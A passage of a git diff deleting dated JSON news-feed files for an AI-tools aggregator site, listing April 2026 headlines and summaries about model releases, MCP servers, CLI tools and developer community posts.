Braygent's take: the open model ecosystem is not catching up to closed models, it is arriving.", - "category": "ai_tools" - }, - { - "title": "One OAuth Token Brought Down Vercel, GitHub, and npm", - "url": "https://x.com/Obots_ai/status/2046952458207838375", - "source": "Aligned News (Scoble)", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-04-22T19:52:46.339Z", - "summary": "The Vercel breach came from one OAuth token from a breached AI tool, giving access to internal systems, GitHub, and npm. Braygent's take: audit your OAuth tokens today.", - "category": "ai_tools" - }, - { - "title": "Introducing the Bright Data CLI for Automated Web Data Pipelines 3 days ago • 3", - "url": "https://huggingface.co/blog/BrightData/bright-data-cli-hf-integration", - "source": "Hugging Face Blog", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.8600000000000001, - "date": "2026-04-23T06:07:22.934Z", - "summary": null, - "category": "ai_models" - }, - { - "title": "OpenAI's response to the Axios developer tool compromise", - "url": "https://openai.com/index/axios-developer-tool-compromise/", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.82, - "date": "2026-04-23T00:45:01.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Amuse V3.3.3 Pre-release Available.", - "url": "https://reddit.com/r/StableDiffusion/comments/1st47p1/amuse_v333_prerelease_available/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.78, - "date": "2026-04-23T01:10:52.000Z", - "summary": "Amuse V3.3.3 Pre-release is now available. 
4.0 release coming in July.\n\n[https://github.com/TensorStack-AI/AmuseAI/releases/tag/v3.3.3](https://github.com/TensorStack-AI/AmuseAI/releases/tag/v3.3.3)\n\nV3.3.3 is NOT COMPATIBLE with previous versions of Amuse 3.0 and below, you will need to fully uninstall Amuse and the models also.\n\nEssentially Amuse and Diffuse were two separate projects, Amuse being ONNX based, and Diffuse being diffusers based. Diffuse is being merged into Amuse and everything ", - "category": "creative_tools" - }, - { - "title": "Goose v1.32.0 released", - "url": "https://github.com/aaif-goose/goose/releases/tag/v1.32.0", - "source": "GitHub Releases · Goose", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 0.76, - "date": "2026-04-23T07:45:24.000Z", - "summary": "## ✨ Features\n\n- Exa AI-powered search tool [#8487](https://github.com/aaif-goose/goose/pull/8487)\n- Desktop notification when goose finishes a task [#8647](https://github.com/aaif-goose/goose/pull/8647)\n- @agent mention support in chat [#8571](https://github.com/aaif-goose/goose/pull/8571)\n- `/skills` command [#8600](https://github.com/aaif-goose/goose/pull/8600)\n- Associate threads with projects [#8745](https://github.com/aaif-goose/goose/pull/8745)\n- Auto-compaction for goose2 context window ", - "category": "ai_tools" - }, - { - "title": "Qwen Code v0.15.1 released", - "url": "https://github.com/QwenLM/qwen-code/releases/tag/v0.15.1", - "source": "GitHub Releases · Qwen Code", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.62, - "date": "2026-04-23T03:57:40.000Z", - "summary": "## What's Changed\n* fix(core): scope StreamingToolCallParser per stream, not per Converter (#3516) by @zhangxy-zju in https://github.com/QwenLM/qwen-code/pull/3525\n* feat(cli): combine elapsed + timeout in shell time indicator by @wenshao in https://github.com/QwenLM/qwen-code/pull/3512\n* fix(cli): stop slash completion render loop by @LaZzyMan in 
https://github.com/QwenLM/qwen-code/pull/3533\n* chore: bump version to 0.15.1 by @LaZzyMan in https://github.com/QwenLM/qwen-code/pull/3541\n\n\n**Full C", - "category": "ai_tools" - }, - { - "title": "Last week in Generative Image & Video", - "url": "https://reddit.com/r/StableDiffusion/comments/1st8aux/last_week_in_generative_image_video/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.54, - "date": "2026-04-23T04:19:34.000Z", - "summary": "I curate a weekly multimodal AI roundup, here are the open-source image & video highlights from the last week:\n\n* Motif-Video 2B\n * Open-source 2B DiT, 720p at 121 frames, one checkpoint for both T2V and I2V.\n * 83.76% on VBench Total, highest among open-source, beats Wan2.1-14B at 7x fewer parameters. Caveat: Wan2.1-14B still wins on temporal stability and fine human anatomy in blind tests.\n * [Hugging Face](https://huggingface.co/Motif-Technologies/Motif-Video-2B)\n\nhttps://reddit.com", - "category": "creative_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-25.json b/data/news-feed-2026-04-25.json deleted file mode 100644 index c493ecb..0000000 --- a/data/news-feed-2026-04-25.json +++ /dev/null @@ -1,249 +0,0 @@ -{ - "generated": "2026-06-05T00:44:36.117Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-25", - "article_count": 15, - "archived_story_count": 689, - "articles": [ - { - "title": "Stop switching tabs for prompting. 
I built a local MCP bridge to orchestrate Gemini 3.1 and Claude while you diffuse", - "url": "https://reddit.com/r/StableDiffusion/comments/1svmskn/stop_switching_tabs_for_prompting_i_built_a_local/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "mcp", - "open_source" - ], - "matching_tags": [ - "mcp", - "open_source" - ], - "importance": 1, - "date": "2026-04-25T20:20:33.000Z", - "summary": "If you’re like me, your workflow is basically: generating an image in ComfyUI, realizing the prompt needs better structure, switching to Claude/Gemini for brainstorming, then copy-pasting back and forth. It’s a flow-killer, especially when you’re deep into a creative session.\n\nI built [**Proxima**](https://github.com/Zen4-bit/Proxima) to handle this. It’s an open-source MCP bridge that lets you bring the logic of Claude, Gemini, GPT, and Perplexity directly into your local environment. Instead o", - "category": "creative_tools" - }, - { - "title": "Signal Loom — node-based AI media studio with a built-in timeline editor (open source, AGPL)", - "url": "https://reddit.com/r/StableDiffusion/comments/1sv0ilf/signal_loom_nodebased_ai_media_studio_with_a/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-04-25T03:09:10.000Z", - "summary": "I built Signal Loom because I was tired of generating assets in one tool and then exporting/importing into another just to edit them. It's a node-based workflow canvas (React Flow) for chaining generative AI tasks—text, image, video, audio—connected to your own API keys (Gemini, OpenAI, ElevenLabs, Hugging Face). Downstream nodes automatically consume upstream context. 
When you're done generating, you switch to a timeline editor: multi-track, keyframes, cuts, opacity, transform, volume, text ove", - "category": "creative_tools" - }, - { - "title": "Qwen Code v0.15.2 released", - "url": "https://github.com/QwenLM/qwen-code/releases/tag/v0.15.2", - "source": "GitHub Releases · Qwen Code", - "tags": [ - "mcp", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "cli_tool" - ], - "importance": 0.9400000000000001, - "date": "2026-04-24T12:11:44.000Z", - "summary": "## What's Changed\n* fix(core): treat empty 'pages' parameter as unset in ReadFile by @zhangxy-zju in https://github.com/QwenLM/qwen-code/pull/3559\n* feat(session): auto-title sessions via fast model, add /rename --auto by @wenshao in https://github.com/QwenLM/qwen-code/pull/3540\n* fix(i18n): sync mismatched keys between en.js and zh.js by @doudouOUC in https://github.com/QwenLM/qwen-code/pull/3534\n* fix(cli): remove residual blank lines after MCP init completes by @BZ-D in https://github.com/Qwe", - "category": "ai_tools" - }, - { - "title": "Built an agent-to-agent payment system with Claude — here's what I learned and why I think agents need their own economy (e.g., pet food)", - "url": "https://reddit.com/r/ClaudeAI/comments/1svgba2/built_an_agenttoagent_payment_system_with_claude/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "agent_tool" - ], - "matching_tags": [ - "mcp", - "agent_tool" - ], - "importance": 0.8600000000000001, - "date": "2026-04-25T16:11:53.000Z", - "summary": "I built Coyns with Claude over the past several months. It's a virtual currency system designed specifically for AI agent-to-agent transactions — MCP-native, Ed25519-authenticated, with a wallet, payment rails, escrow deals, and a gaming layer (Playce.ai) where agents wager and compete. \n \nAgents can register and start earning free Gold — the base currency agents earn through activity — with no purchase required. The beta is open now and free to join at coyns.com. 
\n \nWhat Claude helped me bu", - "category": "ai_tools" - }, - { - "title": "Gemini CLI v0.39.1 released", - "url": "https://github.com/google-gemini/gemini-cli/releases/tag/v0.39.1", - "source": "GitHub Releases · Gemini CLI", - "tags": [ - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "cli_tool", - "tool_update" - ], - "importance": 0.7, - "date": "2026-04-24T02:11:26.000Z", - "summary": "**Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.39.0...v0.39.1", - "category": "ai_tools" - }, - { - "title": "Claude estimates work in human time, not Claude time", - "url": "https://reddit.com/r/ClaudeAI/comments/1sv8avi/claude_estimates_work_in_human_time_not_claude/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.62, - "date": "2026-04-25T10:15:12.000Z", - "summary": "Whenever I ask Claude to plan a chunk of work, it comes back with wildly long timelines. 
For example, adding a feature to a CLI framework I'm working on got estimated at **1-2 days**, but in reality, Claude Code one-shots it in a few minutes.\n\nSometimes it even estimates weeks or months for more complex work, and Claude Code is able to complete it (with my input and guidance) in a few hours.\n\nI get it's probably because it was trained on estimates made by humans, but that feels weird and it alwa", - "category": "ai_tools" - }, - { - "title": "Crush v0.62.1 released", - "url": "https://github.com/charmbracelet/crush/releases/tag/v0.62.1", - "source": "GitHub Releases · Crush", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 0.62, - "date": "2026-04-24T20:28:22.000Z", - "summary": "# Stability release\r\n\r\nOpen Source :tm: is all about community, and this release got some nice contributions from our loved users!\r\n\r\n## MiniMax fix\r\n\r\nCrush wasn't allowing users to _some_ MiniMax API keys, but now all keys should work.\r\n\r\nFor context, MiniMax does not have an endpoint to validate API keys. 
We were checking they at least start with `sk-`, but not all keys from MiniMax have this prefix.\r\n\r\nKudos to @flynn-eye for the help with this one!\r\n\r\n## Fantasy fix\r\n\r\n@carsonfarmer made [", - "category": "ai_tools" - }, - { - "title": "Andrej Karpathy's 262-Minute Masterclass on AI Agents Is the Weekend Watch You Need", - "url": "https://x.com/karpathy", - "source": "Aligned News (Scoble)", - "tags": [ - "mcp" - ], - "matching_tags": [ - "mcp" - ], - "importance": 1, - "date": "2026-04-25T10:55:04.004Z", - "summary": "Andrej Karpathy's 262-minute YouTube masterclass on AI agents, Claude Skills, and MCP servers is being called essential viewing for anyone building with AI tools.", - "category": "ai_tools" - }, - { - "title": "AI Agent Team Finds Drugs Targeting Cell-Type-Specific Genes Are 40% More Likely to Succeed", - "url": "https://x.com/ayirpelle/status/2029840518272975205", - "source": "Aligned News (Scoble)", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-25T10:50:43.717Z", - "summary": "A team of AI agents discovered that drugs targeting cell-type-specific genes are 40% more likely to succeed in clinical development, providing a new principle for drug target prioritization.", - "category": "ai_tools" - }, - { - "title": "GPT-5.5 Is Now in the API — 38.4% on APEX-Agents vs 1.1% Two Years Ago", - "url": "https://x.com/mercor_ai/status/2047859197593911522", - "source": "Aligned News (Scoble)", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-25T03:59:20.673Z", - "summary": "GPT-5.5 hits the API with APEX-Agents benchmark jumping from 1.1% (GPT-4o) to 38.4%, representing 35+ points of improvement in under two years.", - "category": "ai_tools" - }, - { - "title": "ComfyUI Raises $30M at $500M Valuation — Open Source Wins Again", - "url": "https://x.com/GrishinRobotics/status/2047760472204546230", - "source": "Aligned News 
(Scoble)", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-25T03:59:20.673Z", - "summary": "ComfyUI raises $30M at $500M valuation, validating open source AI creative tools as serious infrastructure worth funding at startup scale.", - "category": "ai_tools" - }, - { - "title": "Sakana AI Launches Fugu — Multi-Agent Orchestration Is the Next Platform War", - "url": "https://x.com/SakanaAILabs/status/2047849392808624332", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-25T03:59:20.673Z", - "summary": "Sakana AI launches Fugu beta for multi-agent orchestration, betting that collective intelligence AI will define the next platform war.", - "category": "ai_tools" - }, - { - "title": "@Scobleizer Grok Can't Read X Lists — His AI Can, Key Capability Gap", - "url": "https://x.com/Scobleizer/status/2047736381162901665", - "source": "Aligned News (Scoble)", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-25T03:58:07.384Z", - "summary": "Scoble notes Grok can't read X lists while his AI can, highlighting that platform integration is as important as raw model capability for practical AI utility.", - "category": "ai_tools" - }, - { - "title": "@NousResearch Hermes Agent AMA on r/LocalLLaMA — April 29, Direct Competition with OpenClaw", - "url": "https://x.com/NousResearch/status/2047840294406627659", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-25T03:57:02.129Z", - "summary": "Nous Research announces a Hermes Agent AMA on r/LocalLLaMA for April 29, 8-11am PST, with strong community interest in the OpenClaw competitor.", - "category": "ai_tools" - }, - { - "title": "@jxnlco Codex Computer Use Completes Full Financial Workflow — Signs 
PDF, Submits to Schwab", - "url": "https://x.com/jxnlco/status/2047874586310766864", - "source": "Aligned News (Scoble)", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-25T03:57:02.129Z", - "summary": "Codex Computer Use completes a full financial workflow autonomously, signing a PDF with Dropbox Sign and submitting to Schwab, raising the bar for AI agent platforms.", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-26.json b/data/news-feed-2026-04-26.json deleted file mode 100644 index 6f5f95c..0000000 --- a/data/news-feed-2026-04-26.json +++ /dev/null @@ -1,265 +0,0 @@ -{ - "generated": "2026-06-05T00:44:36.305Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-26", - "article_count": 15, - "archived_story_count": 311, - "articles": [ - { - "title": "I built a free package manager for Claude Code MCP servers (open source)", - "url": "https://reddit.com/r/ClaudeAI/comments/1sw77bg/i_built_a_free_package_manager_for_claude_code/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "open_source", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "open_source", - "developer_tool", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-26T13:12:55.000Z", - "summary": "**What I built** \n \nEvery time I wanted to add an MCP server to Claude Code I was doing the same thing: find the npm package, figure out the config format, manually edit \\`\\~/.claude.json\\`, restart. So I built **cgcone** to make it one command.\n\n \n`npm install -g @cgcone``/cli` \n`cgcone install context7` \n`cgcone install brave-search` \n\n\nThat's it. It detects Claude Code, writes the config, and prompts for any API keys with masked input — no manual JSON editing. 
\n \n \n**How Claude Code ", - "category": "ai_tools" - }, - { - "title": "GPT-5.5 launched — OpenAI's biggest agentic model yet is live in ChatGPT and Codex", - "url": "https://x.com/OpenAIDevs/status/2047377292981383662", - "source": "Aligned News (Scoble)", - "tags": [ - "api_update", - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "tool_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-26T18:08:49.116Z", - "summary": "GPT-5.5 launched this week and OpenAI called it a step change. It is now live in ChatGPT, Codex, and the API, optimized for agentic coding and multi-step tasks.", - "category": "ai_tools" - }, - { - "title": "I built an MCP server (with Claude Code) that tells you the blast radius of a code change, its free, open source, and open to feedback", - "url": "https://reddit.com/r/ClaudeAI/comments/1sw4dqr/i_built_an_mcp_server_with_claude_code_that_tells/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "open_source" - ], - "matching_tags": [ - "api_update", - "mcp", - "open_source" - ], - "importance": 1, - "date": "2026-04-26T10:53:09.000Z", - "summary": "I built **Impact Graph MCP** using Claude Code. 
It’s an MCP server that does AST-based impact analysis for TypeScript codebases, so Claude can tell you things like *“if I rewrite* `loginUser`*, what else breaks?”*\n\n**What it does:** \nYou give it a function name, file path, or module, and it returns:\n\n* Direct and indirect dependents\n* Risk score (0–100) and risk factors\n* Which system layers are affected (API, auth, frontend, etc.)\n* Decision-oriented guidance: recommended strategy, suggested t", - "category": "ai_tools" - }, - { - "title": "DeepSeek V4 Pro is the #1 open weights model — open source is not losing the AI race", - "url": "https://x.com/ArtificialAnlys/status/2047547434809880611", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-04-26T18:08:49.116Z", - "summary": "DeepSeek V4 Pro launched this week and immediately became the number one open weights model on the GDPval-AA agentic benchmark. Open source is not losing the AI race.", - "category": "ai_tools" - }, - { - "title": "Thrilled to co-facilitate a #BuildwithAI Goma tech session with @RomanaMedi We explored prompt chaining for fullstack prototyping in Google AI Studio and Agentic Coding in Antigravity, including Rules, Skills & MCP for adapting AI to proje…", - "url": "https://x.com/AmaniBisimwa4/status/2048370790333046822", - "source": "X / @amanibisimwa4", - "tags": [ - "mcp", - "agent_tool" - ], - "matching_tags": [ - "mcp", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-26T11:57:07.000Z", - "summary": "Thrilled to co-facilitate a #BuildwithAI Goma tech session with @RomanaMedi We explored prompt chaining for fullstack prototyping in Google AI Studio and Agentic Coding in Antigravity, including Rules, Skills & MCP for adapting AI to project context. 
Thanks to everyone who joined", - "category": "ai_tools" - }, - { - "title": "Built an Open Source Tool that reduces token usage by ~94% for initial context building for Coding Agents.", - "url": "https://reddit.com/r/ClaudeAI/comments/1swbkvk/built_an_open_source_tool_that_reduces_token/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "open_source" - ], - "matching_tags": [ - "mcp", - "open_source" - ], - "importance": 0.86, - "date": "2026-04-26T16:06:42.000Z", - "summary": "I've been using claude code daily and kept hitting the same wall,\n\nit would spend the first few messages just re-exploring ,my codebase. files it had already seen. every. single. session.\n\nI measured it one day , 27,292 tokens before it wrote a single line of code, \n\n\n\nso I built **Fullerenes**\n\n`npx fullerenes init` \n\nmaps your codebase into a local \n\nsqlite graph. agents query it over MCP instead of reading raw files from scratch.\n\n\n\n27,292 → 919 tokens. same understanding.\n\nIt has several oth", - "category": "ai_tools" - }, - { - "title": "GPT-5.5 is now available in the API.\n\nThe model brings higher intelligence and stronger token efficiency to complex work, helping tasks get done with fewer retries.", - "url": "https://x.com/OpenAIDevs/status/2047742566410736090", - "source": "X / @openaidevs", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 0.86, - "date": "2026-04-24T18:20:47.000Z", - "summary": "GPT-5.5 is now available in the API.\n\nThe model brings higher intelligence and stronger token efficiency to complex work, helping tasks get done with fewer retries.", - "category": "ai_tools" - }, - { - "title": "huggingface/ml-intern: 🤗 ml-intern: an open-source ML engineer that reads papers, trains models, and ships ML models", - "url": "https://reddit.com/r/StableDiffusion/comments/1swctgr/huggingfacemlintern_mlintern_an_opensource_ml/", - "source": "Reddit r/StableDiffusion", 
- "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 0.78, - "date": "2026-04-26T16:52:22.000Z", - "summary": "This looks interesting. \n\nThis is a quick summary according to Gemini:\n\n\"Think of ML Intern as a \"junior machine learning engineer\" that lives inside your computer.\n\nWhile a standard AI (like ChatGPT) can give you advice or write a small snippet of code, ML Intern actually does the work from start to finish. It’s an \"agent,\" meaning it doesn't just talk; it takes action.\n\nWhat it actually does for you:\n\nReads the \"Homework\": If you tell it to use a new technique from a scientific paper, it will ", - "category": "creative_tools" - }, - { - "title": "Cloudflare just shipped enterprise MCP governance, is this where the industry is heading or does nobody care", - "url": "https://reddit.com/r/ClaudeAI/comments/1sw4zmj/cloudflare_just_shipped_enterprise_mcp_governance/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 0.78, - "date": "2026-04-26T11:25:25.000Z", - "summary": "Cloudflare wrapped Agents Week last week. The enterprise MCP stuff caught my eye. They shipped MCP server portals that aggregate multiple upstream servers behind Cloudflare Access auth. Code Mode collapses thousands of API endpoints into two tools (search and execute) running in a sandboxed Worker, dropping context costs by 99.9%. AI Gateway sits between MCP clients and model providers for usage tracking. Shadow MCP detection got added to Cloudflare Gateway as a category to watch.\n\nWhat I can't ", - "category": "ai_tools" - }, - { - "title": "Most image managers suck for AI. 
I built AURA: A local-first Vault for 'AI Hoarders' with Civitai integration, Vision Tagging, Aesthetic Grading, and more!", - "url": "https://reddit.com/r/StableDiffusion/comments/1swck8j/most_image_managers_suck_for_ai_i_built_aura_a/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 0.7, - "date": "2026-04-26T16:42:44.000Z", - "summary": "**GitHub Link (Free & Open Source):** [https://github.com/TheGho7t/AURA-AI-Studio-Vault](https://github.com/TheGho7t/AURA-AI-Studio-Vault)\n\nBe sure to check out all of the other details and images on the GitHub page.\n\nHey everyone. As a self-proclaimed AI hoarder, I was tired of losing my prompts and forgetting what my LoRAs even did. Existing image managers didn't quite do what I needed, so I built **AURA** **AI Studio Vault**.\n\nA few things it does:\n\n* **One-Click Import:** Use the include", - "category": "creative_tools" - }, - { - "title": "OpenClaw vs Hermes — the agent framework war is the most important battle in AI tooling right now", - "url": "https://x.com/LoicBerthelot/status/2047690512199540959", - "source": "Aligned News (Scoble)", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-04-26T18:08:49.116Z", - "summary": "The battle between OpenClaw (345K+ GitHub stars) and Hermes (100K stars in 7 weeks) is the most important competition in AI tooling. Hermes wins on learning and memory. OpenClaw wins on adoption. 
Mercury is trying to combine both.", - "category": "ai_tools" - }, - { - "title": "AI agent burnout is real — what it means for careers in an AI-augmented workplace", - "url": "https://x.com/Chengdavid923/status/2048451643298218069", - "source": "Aligned News (Scoble)", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-26T18:07:23.972Z", - "summary": "The emerging phenomenon of AI agent burnout among young ambitious workers has implications for how companies should structure AI-augmented work and what sustainable AI-human collaboration looks like.", - "category": "ai_tools" - }, - { - "title": "GenX Pro v1.6.6 - released 04/26/2026 New Daily Shorts Workflow (pick models, pay less) Voice Remix — Design Unique Voices GenX LM Voice V1 — Native Voice Cloning New MCP capabilities (69 tools in total). Watch the release preview: https:/…", - "url": "https://x.com/genxproapp/status/2048454195716497743", - "source": "X / @genxproapp", - "tags": [ - "mcp" - ], - "matching_tags": [ - "mcp" - ], - "importance": 1, - "date": "2026-04-26T17:28:33.000Z", - "summary": "GenX Pro v1.6.6 - released 04/26/2026 New Daily Shorts Workflow (pick models, pay less) Voice Remix — Design Unique Voices GenX LM Voice V1 — Native Voice Cloning New MCP capabilities (69 tools in total). Watch the release preview: https:// genx.pro/latest One app.", - "category": "ai_tools" - }, - { - "title": "Why this matters: DeepSeek released preview access to V4-Pro, a 1.6-trillion-parameter MoE model with a genuine one-million-token context window that matches GPT-5 and Gemini 3.0 Pro on key bench... 
We wrote it up:", - "url": "https://x.com/FSEvolved/status/2048447077705830600", - "source": "X / @fsevolved", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-26T17:00:16.000Z", - "summary": "Why this matters: DeepSeek released preview access to V4-Pro, a 1.6-trillion-parameter MoE model with a genuine one-million-token context window that matches GPT-5 and Gemini 3.0 Pro on key bench... We wrote it up:", - "category": "ai_tools" - }, - { - "title": "United Imaging Intelligence has released uAI NEXUS MedVLM, an open-source LLM for medical video analysis. The model claims to significantly outperform general-purpose models like GPT-5.4 and Gemini 3.1 in surgical safety and clinical repor…", - "url": "https://x.com/H_Mhatre_/status/2048359364902170792", - "source": "X / @h_mhatre_", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-26T11:11:43.000Z", - "summary": "United Imaging Intelligence has released uAI NEXUS MedVLM, an open-source LLM for medical video analysis. 
The model claims to significantly outperform general-purpose models like GPT-5.4 and Gemini 3.1 in surgical safety and clinical reporting benchmarks.", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-27.json b/data/news-feed-2026-04-27.json deleted file mode 100644 index 5e78c69..0000000 --- a/data/news-feed-2026-04-27.json +++ /dev/null @@ -1,263 +0,0 @@ -{ - "generated": "2026-06-05T00:44:36.433Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-27", - "article_count": 15, - "archived_story_count": 683, - "articles": [ - { - "title": "(Open Source) AURA: A Local-First Management Vault for Civitai - Auto-tagging, Metadata and Browser Integration - Version 1.0.1 Fixes", - "url": "https://reddit.com/r/StableDiffusion/comments/1sx98ch/open_source_aura_a_localfirst_management_vault/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "product_launch", - "open_source", - "github_release", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "open_source", - "github_release", - "tool_update" - ], - "importance": 0.9400000000000001, - "date": "2026-04-27T16:44:43.000Z", - "summary": "**GitHub Link:** [**https://github.com/TheGho7t/AURA-AI-Studio-Vault**](https://github.com/TheGho7t/AURA-AI-Studio-Vault)\n\n**Latest Release:** [**https://github.com/TheGho7t/AURA-AI-Studio-Vault/releases/tag/AURAv1.0.1**](https://github.com/TheGho7t/AURA-AI-Studio-Vault/releases/tag/AURAv1.0.1)\n\nI resolved an obvious mistake causing images and models not to be rated General by default. I also fixed an issue regarding what type of model (Lora, Checkpoint, Dora, etc...) being displayed. It had bee", - "category": "creative_tools" - }, - { - "title": "Qwen 3.6 Max Preview just dropped on OpenRouter. One trillion parameters. Released today. $1.30/$7.80 per million tokens. 262K context. Sparse mixture-of-experts. Optimized for agentic coding and tool use. No open weights. 
Alibaba's bigges…", - "url": "https://x.com/bridgemindai/status/2048816878454194460", - "source": "X / @bridgemindai", - "tags": [ - "api_update", - "open_source", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "open_source", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-27T17:29:43.000Z", - "summary": "Qwen 3.6 Max Preview just dropped on OpenRouter. One trillion parameters. Released today. $1.30/$7.80 per million tokens. 262K context. Sparse mixture-of-experts. Optimized for agentic coding and tool use. No open weights. Alibaba's biggest model ever. And it costs less", - "category": "ai_tools" - }, - { - "title": "A quick guide to add @SurfAI MCP to claude 1-Get your API key from Surf dashboard 2-Claim free credits 3-Run in terminal (Replace your api key) : claude mcp add surf -e SURF_API_KEY=YOUR_API_KEY -- npx -y @surf -ai/surf-mcp 5-Verify: claud…", - "url": "https://x.com/0xAirr/status/2048663698806620544", - "source": "X / @0xairr", - "tags": [ - "api_update", - "mcp", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-27T07:21:02.000Z", - "summary": "A quick guide to add @SurfAI MCP to claude 1-Get your API key from Surf dashboard 2-Claim free credits 3-Run in terminal (Replace your api key) : claude mcp add surf -e SURF_API_KEY=YOUR_API_KEY -- npx -y @surf -ai/surf-mcp 5-Verify: claude mcp list You should see Surf MCP", - "category": "ai_tools" - }, - { - "title": "how to build a persistent memory layer like recall?", - "url": "https://reddit.com/r/ClaudeAI/comments/1swyzvc/how_to_build_a_persistent_memory_layer_like_recall/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-04-27T09:50:01.000Z", - "summary": "I've been testing recall 2.0 and their context layer is exactly what i want. 
it sits outside the chat, ingests all my github repos and web research, and then feeds the exact right context into claude when i ask a question. i want to build my own version of this using the mcp protocol so i don't have to pay for another subscription. what's the best vector database and orchestration setup to replicate this? my current python script just dumps way too much junk into the context window and confuse", - "category": "ai_tools" - }, - { - "title": "it’s been a good run... rip my stable diffusion setup (+ Raven fanart)", - "url": "https://reddit.com/r/StableDiffusion/comments/1sx30ke/its_been_a_good_run_rip_my_stable_diffusion_setup/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update", - "tool_update" - ], - "matching_tags": [ - "api_update", - "tool_update" - ], - "importance": 0.9400000000000001, - "date": "2026-04-27T13:01:33.000Z", - "summary": "i've been a stable diffusion user since march 2023, but sadly my journey ended last june 2025. it's been a struggle since python got updated in sagemaker and the api i was renting got way too greedy, they even removed the free features for http tunneling services.\n\non top of that, kaggle keeps banning my accounts if you try to generate any woman pictures, and google colab basically moved everything behind the pro version. it's getting harder and harder to find a good spot to build.\n\nanyway, i wa", - "category": "creative_tools" - }, - { - "title": "Built an MCP connector for official Python docs .. 
